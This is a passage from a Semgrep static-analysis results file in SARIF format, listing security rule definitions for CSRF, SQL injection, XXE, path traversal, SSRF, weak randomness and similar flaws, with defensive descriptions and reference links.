prevention](https://cheatsheetseries.owasp.org/cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html)"},"helpUri":"https://semgrep.dev/r/go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","id":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","name":"go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection","properties":{"precision":"very-high","tags":["CWE-352: Cross-Site Request Forgery (CSRF)","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: go.net.csrf.gorilla-csrf.go-net-http-route-without-gorilla-csrf-protection.go-net-http-route-without-gorilla-csrf-protection"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions. To build SQL queries safely in Java, it is possible to adopt prepared statements by using the `java.sql.PreparedStatement` class with bind variables."},"helpUri":"https://semgrep.dev/r/java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","id":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","name":"java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.spring.security.spring-sqli-deepsemgrep.spring-sqli-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected user data flowing into exec. This is code injection and should be avoided."},"help":{"markdown":"Detected user data flowing into exec. This is code injection and should be avoided.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection)\n - [https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html](https://nedbatchelder.com/blog/201206/exec_really_is_dangerous.html)\n","text":"Detected user data flowing into exec. This is code injection and should be avoided."},"helpUri":"https://semgrep.dev/r/python.flask.security.injection.user-exec.exec-injection","id":"python.flask.security.injection.user-exec.exec-injection","name":"python.flask.security.injection.user-exec.exec-injection","properties":{"precision":"very-high","tags":["CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.security.injection.user-exec.exec-injection"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"help":{"markdown":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request)\n - [https://godoc.org/github.com/levigross/grequests#DoRegularRequest](https://godoc.org/github.com/levigross/grequests#DoRegularRequest)\n - [https://github.com/levigross/grequests](https://github.com/levigross/grequests)\n","text":"Checks for requests to http (unencrypted) sites using grequests, a popular HTTP client library. This is dangerous because it could result in plaintext PII being passed around the network."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","id":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","name":"problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.go-stdlib.grequests-http-request.grequests-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint)\n - [https://docs.rs/sqlx/latest/sqlx/](https://docs.rs/sqlx/latest/sqlx/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/rust.hyper.sql.sqlx-taint.sqlx-taint","id":"rust.hyper.sql.sqlx-taint.sqlx-taint","name":"rust.hyper.sql.sqlx-taint.sqlx-taint","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.hyper.sql.sqlx-taint.sqlx-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"help":{"markdown":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks](https://learn.microsoft.com/en-us/dotnet/api/system.random?view=net-6.0#remarks)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.randomnumbergenerator?view=net-6.0)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.aesgcm?view=net-6.0#constructors)\n - [https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key](https://learn.microsoft.com/en-us/dotnet/api/system.security.cryptography.symmetricalgorithm.key?view=net-6.0#system-security-cryptography-symmetricalgorithm-key)\n","text":"You are using an insecure random number generator (RNG) to create a cryptographic key. System.Random must never be used for cryptographic purposes. Use System.Security.Cryptography.RandomNumberGenerator instead."},"helpUri":"https://semgrep.dev/r/csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","id":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","name":"csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration","properties":{"precision":"very-high","tags":["CWE-338: Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)","HIGH CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.dotnet.security.use_weak_rng_for_keygeneration.use_weak_rng_for_keygeneration"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n - [https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/](https://www.stackhawk.com/blog/django-path-traversal-guide-examples-and-prevention/)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","id":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","name":"python.django.file.tainted-pickleshare-django.tainted-pickleshare-django","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.file.tainted-pickleshare-django.tainted-pickleshare-django"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"help":{"markdown":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"The application uses an empty credential. This can lead to unauthorized access by either an internal or external malicious actor. It is recommended to rotate the secret and retrieve them from a secure secret vault or Hardware Security Module (HSM), alternatively environment variables can be used if allowed by your company policy."},"helpUri":"https://semgrep.dev/r/go.secrets.gorm.gorm-empty-password.gorm-empty-password","id":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","name":"go.secrets.gorm.gorm-empty-password.gorm-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A02:2017 - Broken Authentication","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: go.secrets.gorm.gorm-empty-password.gorm-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"help":{"markdown":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js)\n - [https://golang.org/pkg/html/template/#JS](https://golang.org/pkg/html/template/#JS)\n","text":"Found a formatted template string passed to 'template.JS()'. 'template.JS()' does not escape contents. Be absolutely sure there is no user-controlled data in this template."},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","id":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","name":"go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.net.unescaped-data-in-js.unescaped-data-in-js"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"help":{"markdown":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe)\n - [https://www.npmjs.com/package/xml2json](https://www.npmjs.com/package/xml2json)\n","text":"Make sure that unverified user data can not reach the XML Parser, as it can result in XML External or Internal Entity (XXE) Processing vulnerabilities"},"helpUri":"https://semgrep.dev/r/javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","id":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","name":"javascript.express.security.express-xml2json-xxe.express-xml2json-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.express-xml2json-xxe.express-xml2json-xxe"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"help":{"markdown":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string](https://wiki.sei.cmu.edu/confluence/display/c/STR32-C.+Do+not+pass+a+non-null-terminated+character+sequence+to+a+library+function+that+expects+a+string)\n","text":"The string returned from `std::string_view.data()` is not guaranteed to be NULL terminated. This expression expects a NULL terminated string and will trigger an out-of-bounds read."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","id":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","name":"cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator","properties":{"precision":"very-high","tags":["CWE-125: Out-of-bounds Read","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.string-view-data-null-terminator.string-view-data-null-terminator"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-general-entities\", false)` `$PARSER.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")`. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","id":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","name":"java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.saxparserfactory-xxe.saxparserfactory-xxe"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"help":{"markdown":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"A formatted or concatenated string was detected as input to a java.lang.Runtime call. This is dangerous if a variable is controlled by user input and could result in a command injection. Ensure your variables are not controlled by users or sufficiently sanitized."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","id":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","name":"java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.command-injection-formatted-runtime-call.command-injection-formatted-runtime-call"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"help":{"markdown":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"The application creates a database connection with an empty password. This can lead to unauthorized access by either an internal or external malicious actor. To prevent this vulnerability, enforce authentication when connecting to a database by using environment variables to securely provide credentials or retrieving them from a secure vault or HSM (Hardware Security Module)."},"helpUri":"https://semgrep.dev/r/ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","id":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","name":"ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password","properties":{"precision":"very-high","tags":["CWE-287: Improper Authentication","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.mysql2.ruby-mysql2-empty-password.ruby-mysql2-empty-password"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"help":{"markdown":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. \n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"The following request $REQUEST.$METHOD() was found to be crafted from user-input `$REQ` which can lead to Server-Side Request Forgery (SSRF) vulnerabilities. It is recommended where possible to not allow user-input to craft the base request, but to be treated as part of the path or query parameter. When user-input is necessary to craft the request, it is recommeneded to follow OWASP best practices to prevent abuse. "},"helpUri":"https://semgrep.dev/r/javascript.express.security.audit.express-ssrf.express-ssrf","id":"javascript.express.security.audit.express-ssrf.express-ssrf","name":"javascript.express.security.audit.express-ssrf.express-ssrf","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.express.security.audit.express-ssrf.express-ssrf"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"setMultipleAllowances() is missing onlyOwner modifier"},"help":{"markdown":"setMultipleAllowances() is missing onlyOwner modifier\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control)\n - [https://twitter.com/danielvf/status/1494317265835147272](https://twitter.com/danielvf/status/1494317265835147272)\n - [https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8](https://etherscan.io/address/0x876b9ebd725d1fa0b879fcee12560a6453b51dc8)\n - [https://play.secdim.com/game/dapp/challenge/rigoownsol](https://play.secdim.com/game/dapp/challenge/rigoownsol)\n","text":"setMultipleAllowances() is missing onlyOwner modifier"},"helpUri":"https://semgrep.dev/r/solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","id":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","name":"solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control","properties":{"precision":"very-high","tags":["CWE-284: Improper Access Control","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: solidity.security.rigoblock-missing-access-control.rigoblock-missing-access-control"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"help":{"markdown":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n","text":"Found request data in a call to 'open'. Ensure the request data is validated or sanitized, otherwise it could result in path traversal attacks and therefore sensitive data being leaked. To mitigate, consider using os.path.abspath or os.path.realpath or the pathlib library."},"helpUri":"https://semgrep.dev/r/python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","id":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","name":"python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","MEDIUM CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.security.injection.path-traversal.path-traversal-open.path-traversal-open"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate URLs and their protocol before using them in your codebase."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a 